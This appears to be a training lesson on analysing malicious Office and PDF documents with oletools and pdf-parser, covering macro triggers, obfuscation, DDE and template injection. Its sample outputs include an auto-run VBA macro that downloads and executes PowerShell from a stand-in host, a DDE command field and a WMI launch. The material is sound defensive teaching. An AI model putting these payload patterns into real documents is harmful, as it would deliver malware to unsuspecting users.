- Explain why Office documents remain the number one malware delivery vector and how attackers exploit user trust - Understand the OLE2 Compound Binary Format and how it embeds VBA macro code, embedded objects, and metadata - Identify common VBA macro triggers (AutoOpen, Document_Open, Workbook_Open) and their execution conditions - Use the oletools suite (olevba, oleid, rtfobj, mraptor) to extract, analyze, and assess macro risk without opening the document - Apply macro deobfuscation techniques to decode string concatenation, Chr() encoding, environment variable abuse, and WMI execution paths - Analyze modern document threats including XLM 4.0 macros, DDE injection, and template injection via remote templates - Perform basic PDF malware analysis targeting JavaScript payloads, embedded files, and launch actions - Follow a safer analysis workflow that avoids direct document opening at every stage

Every phishing campaign in your inbox starts the same way: an email with an attachment. That attachment is almost always a document — a Word file, an Excel spreadsheet, a PDF. According to multiple annual threat reports, malicious Office documents account for over 40% of all malware delivery, more than executables, scripts, and archives combined. This lesson teaches you to dissect those documents without ever opening them. ## Why Office Documents Dominate Malware Delivery Three factors make Office documents the perfect weapon: | Factor | Why It Works | |---|---| | **Trust** | Users open documents every day — invoices, reports, contracts. A `.docx` feels safe in a way that a `.exe` never does. | | **Built-in code execution** | VBA macros provide a full programming environment embedded inside the document. Microsoft designed this for automation — attackers repurposed it for payload delivery. | | **Evasion** | Document files bypass many email gateways and endpoint protections that focus on executable files. Macros execute inside a trusted application (Word, Excel), inheriting its reputation. |

**Microsoft's mitigation timeline.** Microsoft began blocking macros in files downloaded from the internet by default in 2022 (Mark of the Web + VBA blocking). Attackers adapted with template injection, OneNote containers, ISO files, and other bypass techniques. The core analysis skills in this lesson apply regardless of which bypass technique is currently in vogue.

## OLE2 File Format: What Is Inside a .doc File? The OLE2 Compound Binary Format (also called Compound File Binary Format) is a file system within a file. Think of a `.doc` file as a miniature FAT filesystem containing multiple "streams" — named data blobs that hold document content, formatting, macros, embedded objects, and metadata. | Stream | Contents | |---|---| | `WordDocument` | The document text and formatting | | `Macros/VBA/ThisDocument` | VBA macro source code | | `Macros/VBA/Module1` | Additional VBA modules | | `\x01CompObj` | Application identification | | `\x05SummaryInformation` | Document metadata (author, dates, etc.) | | `ObjectPool/` | Embedded OLE objects (other files inside the document) | Modern `.docx`/`.xlsx`/`.pptx` files use the Open XML format (ZIP archive containing XML files), but VBA macros still use OLE2 containers embedded within the ZIP structure (`vbaProject.bin`). Malware authors frequently use the legacy `.doc`/`.xls` format specifically because the OLE2 binary format is harder to inspect casually. ## VBA Macro Triggers Macros do not execute by themselves. They need a trigger. Attackers use auto-execution hooks that fire when the document is opened: | Trigger | Application | When It Fires | |---|---|---| | `AutoOpen()` | Word | When a `.doc` document is opened (legacy) | | `Document_Open()` | Word | When a `.docx` or `.doc` document is opened | | `Auto_Open()` | Excel | When a `.xls` workbook is opened (legacy) | | `Workbook_Open()` | Excel | When a `.xlsx` or `.xls` workbook is opened | | `AutoExec()` | Word | When Word starts (template-based) | | `AutoClose()` | Word | When the document is closed (delayed execution) | | `Document_Close()` | Word | When the document is closed |

**AutoClose and Document_Close are sneaky.** Malware that triggers on document close evades sandboxes that only monitor the first few seconds after opening. If your sandbox opens the file, waits 60 seconds, and sees nothing, it marks the file clean. The payload fires when the sandbox closes the document. Always check for close-triggered macros.

## The oletools Suite oletools is a Python toolkit purpose-built for analyzing OLE2 files and VBA macros. It is the standard tool for document malware analysis in most SOC teams. ### Installation ```bash # Install oletools (pre-installed on REMnux) pip install oletools # Verify installation olevba --help oleid --help ``` ### oleid: Quick Identification oleid performs a rapid triage of a document file, reporting whether it contains macros, encrypted content, external relationships, or other risk indicators: ```bash $ oleid suspicious_invoice.doc Filename: suspicious_invoice.doc Indicator Value ----------------------------- --------- File format OLE Container format OLE Application name Microsoft Office Word Encrypted False VBA Macros Yes XLM Macros No External Relationships No ObjectPool No Flash objects 0 ``` The key fields: **VBA Macros: Yes** tells you there is code to extract. **External Relationships** would indicate template injection. **ObjectPool** would indicate embedded OLE objects. ### olevba: Extract and Deobfuscate VBA olevba is the workhorse. It extracts VBA macro source code, identifies suspicious keywords, and performs basic deobfuscation: ```bash $ olevba suspicious_invoice.doc VBA MACRO ThisDocument.cls in file: suspicious_invoice.doc - OLE stream: 'Macros/VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub AutoOpen() Dim cmd As String cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) cmd = cmd & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) Dim url As String url = "http://evil" & "domain.com" & "/payload.exe" Shell cmd & " -c ""IEX(New-Object Net.WebClient).DownloadString('" & url & "')""", vbHide End Sub +----------+--------------------+---------------------------------------------+ |Type |Keyword |Description | +----------+--------------------+---------------------------------------------+ |AutoExec |AutoOpen |Runs when the Word document is opened | |Suspicious|Shell |May run an executable file or a system command| |Suspicious|Chr |May obfuscate strings (Chr decoding) | |Suspicious|vbHide |May run a hidden process | |IOC |http://evildomain |URL (potentially malicious) | +----------+--------------------+---------------------------------------------+ ``` ![oletools analysis workflow — oleid for triage, olevba for extraction, mraptor for risk assessment](https://cyberblue-academy-content.s3.us-east-2.amazonaws.com/courses/cyberbluesoc-academy/module-malware/lesson-ma-5/oletools-analysis-workflow.png) ### rtfobj: RTF Embedded Objects RTF files can embed OLE objects that execute on open. rtfobj extracts these: ```bash $ rtfobj malicious_resume.rtf File: malicious_resume.rtf RTF Embedded Objects: id: 0 format_id: 2 (Embedded) class name: 'Package' data size: 45312 OLE Package: Filename: update.exe Source path: C:\Temp\update.exe Temp path: C:\Temp\update.exe # Extract the embedded object for further analysis $ rtfobj -s all malicious_resume.rtf Saved object to: malicious_resume.rtf_object_0.bin ``` ### mraptor: Macro Risk Assessment mraptor performs a quick risk assessment — does the document auto-execute macros, write files, or execute commands? ```bash $ mraptor suspicious_invoice.doc FILE: suspicious_invoice.doc Result: SUSPICIOUS Flags: AutoExec, Write, Execute - Auto-execution trigger: AutoOpen - File write capability: Shell command - Code execution: Shell function call ``` The three flags to watch: **AutoExec** (runs without user action beyond opening), **Write** (creates/modifies files), **Execute** (runs commands or processes). ## Macro Deobfuscation Techniques Attackers obfuscate macro code to bypass static analysis and AV signatures. Here are the most common techniques and how to decode them: ### String Concatenation ```vba ' Obfuscated Dim s As String s = "pow" & "ersh" & "ell" & ".e" & "xe" ' Deobfuscated: powershell.exe ``` ### Chr() Encoding ```vba ' Obfuscated s = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ' Deobfuscated: powershell ' Decode manually: 112=p, 111=o, 119=w, 101=e, 114=r, 115=s, 104=h, 101=e, 108=l, 108=l ``` ```python # Quick Python decoder for Chr() chains import re code = 'Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108)' result = ''.join(chr(int(x)) for x in re.findall(r'Chr$(\d+)$', code)) print(result) # powershell ``` ### Environment Variable Abuse ```vba ' Obfuscated — uses environment variables to avoid string detection Dim path As String path = Environ("COMSPEC") ' Resolves to C:\Windows\system32\cmd.exe ' Or building paths dynamically path = Environ("APPDATA") & "\\update.exe" ``` ### WMI Execution ```vba ' Obfuscated — uses WMI to execute commands instead of Shell() Dim objWMI As Object Set objWMI = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process") objWMI.Create "powershell.exe -enc JABjAGwA..." ' This avoids triggering rules that look for Shell() or CreateObject("WScript.Shell") ``` ![Common macro deobfuscation techniques — from simple concatenation to WMI-based execution](https://cyberblue-academy-content.s3.us-east-2.amazonaws.com/courses/cyberbluesoc-academy/module-malware/lesson-ma-5/macro-deobfuscation-techniques.png)

**olevba handles most deobfuscation automatically.** Run `olevba --deobf` to get decoded strings, resolved Chr() sequences, and concatenated values. For heavily obfuscated macros, combine olevba output with manual Python scripting and ViperMonkey (a VBA emulator that executes macros in a sandbox).

## Modern Document Threats VBA macros are the classic attack, but modern threats have expanded beyond them: ### XLM 4.0 Macros (Excel) XLM macros predate VBA and are stored in hidden Excel sheets rather than VBA modules. Many security tools miss them because they do not look like traditional macros: ``` # XLM macros live in hidden sheets, not VBA streams # Use olevba with --xlm flag or XLMDeobfuscator $ olevba --xlm suspicious_spreadsheet.xls # Or use the dedicated tool $ xlmdeobfuscator -f suspicious_spreadsheet.xls ``` | XLM Feature | Why It Is Dangerous | |---|---| | Stored in hidden sheets | Not visible in VBA editor; analysts miss them | | No VBA stream | Tools scanning for VBA macros report "no macros found" | | EXEC() and CALL() functions | Can execute arbitrary commands and DLL functions | | Formula-based | Logic expressed as cell formulas, harder to read than VBA | ### DDE Injection (Dynamic Data Exchange) DDE allows Office documents to pull data from other applications. Attackers abuse this to execute commands without any macros: ``` # DDE field in a Word document { DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -c IEX(...)" } # The document has NO macros — oleid reports VBA Macros: No # But opening it prompts "This document contains links to other data sources" ```

**DDE attacks have no macros to scan.** Traditional macro analysis tools report the document as clean. Look for DDE fields in document XML (`word/document.xml` in .docx files) or use olevba which also detects DDE patterns. Users see a prompt about "updating links" — not a macro warning — making the social engineering more effective.

### Template Injection Template injection loads a remote template containing malicious macros. The document itself has no macros — it just references a URL: ```xml ``` The attack flow: 1. User opens a clean-looking `.docx` (no macros, passes AV) 2. Word fetches the remote template from the attacker's server 3. The template contains VBA macros that execute Detection: check for **External Relationships** in oleid output, or manually inspect the `_rels/` directory inside the docx ZIP file. ## PDF Malware Analysis PDFs can contain JavaScript, embedded files, and launch actions. While less common than Office malware, PDF-based attacks target organizations that have blocked Office macros. ### Key PDF Analysis Tools | Tool | Purpose | |---|---| | `pdf-parser` | Parse PDF structure, extract streams and objects | | `pdfid` | Quick triage — counts JavaScript, embedded files, launch actions | | `peepdf` | Interactive PDF analysis framework | ### Quick PDF Triage with pdfid ```bash $ pdfid suspicious_report.pdf PDFiD 0.2.8 suspicious_report.pdf PDF Header: %PDF-1.7 obj 12 endobj 12 stream 4 endstream 4 /Page 1 /JS 2 <-- JavaScript present! /JavaScript 2 <-- JavaScript present! /OpenAction 1 <-- Runs on document open! /EmbeddedFile 1 <-- Contains embedded file! /Launch 0 /AcroForm 0 ``` Red flags: `/JS` or `/JavaScript` (embedded code), `/OpenAction` (auto-execute on open), `/EmbeddedFile` (file inside the PDF), `/Launch` (execute external application), `/AA` (additional actions). ### Extracting PDF JavaScript ```bash # Use pdf-parser to extract JavaScript streams $ pdf-parser --search javascript suspicious_report.pdf obj 8 0 Type: /Action Contains stream /S /JavaScript /JS (stream content) # Extract the stream $ pdf-parser --object 8 --filter --raw suspicious_report.pdf > extracted_js.txt ``` ## Safer Analysis Workflow The golden rule of document malware analysis: **never open the document in its native application until you have exhausted every static analysis technique.** | Step | Action | Tool | |---|---|---| | 1 | **Hash and check reputation** | sha256sum → VirusTotal lookup | | 2 | **Quick triage** | oleid (Office) or pdfid (PDF) — identify risk indicators | | 3 | **Extract macros** | olevba --deobf (Office) or pdf-parser (PDF) | | 4 | **Assess risk** | mraptor — AutoExec + Write + Execute flags | | 5 | **Extract embedded objects** | rtfobj (RTF) or pdf-parser (PDF) | | 6 | **Deobfuscate manually** | Python scripting for remaining encoded strings | | 7 | **Dynamic analysis (if needed)** | Open in sandboxed VM with network monitoring (Lesson 11.3-11.4 techniques) |

**Never open suspicious documents on your analysis workstation.** Even with macros disabled, documents can exploit parser vulnerabilities in Office or PDF readers. Always use a dedicated analysis VM. If you must view the document content visually, use LibreOffice in a Linux VM (different parser, different vulnerability surface) or convert to PDF/image first.

## Key Takeaways - Office documents are the **#1 malware delivery vector** because users trust them, they contain built-in code execution (VBA), and they bypass many security controls designed for executables - The **OLE2 format** is a file system within a file — macros, embedded objects, and metadata live in named streams that oletools can extract and inspect - **Auto-execution triggers** (AutoOpen, Document_Open, Workbook_Open) fire when documents are opened; close triggers (AutoClose, Document_Close) evade sandboxes that only monitor opening - **oletools is the standard SOC toolkit**: oleid for triage, olevba for extraction and deobfuscation, rtfobj for RTF objects, mraptor for risk assessment - Common **deobfuscation patterns**: string concatenation, Chr() encoding, environment variable resolution, and WMI-based execution to avoid Shell() detection - **Modern threats** extend beyond VBA: XLM 4.0 macros hide in spreadsheet cells, DDE injection has no macros at all, and template injection fetches remote payloads - **PDF analysis** uses pdfid for triage and pdf-parser for stream extraction — watch for /JS, /OpenAction, /EmbeddedFile, and /Launch indicators - The **safer analysis workflow** exhausts static techniques before dynamic analysis: hash → triage → extract → deobfuscate → sandbox (only if needed) ## What's Next Put your document analysis skills to the test. In **Lab 11.5 — Malicious Document Analysis**, you'll analyze real weaponized Office documents — extracting malicious macros, embedded objects, and obfuscated payloads using oletools and YARA to trace the complete infection chain.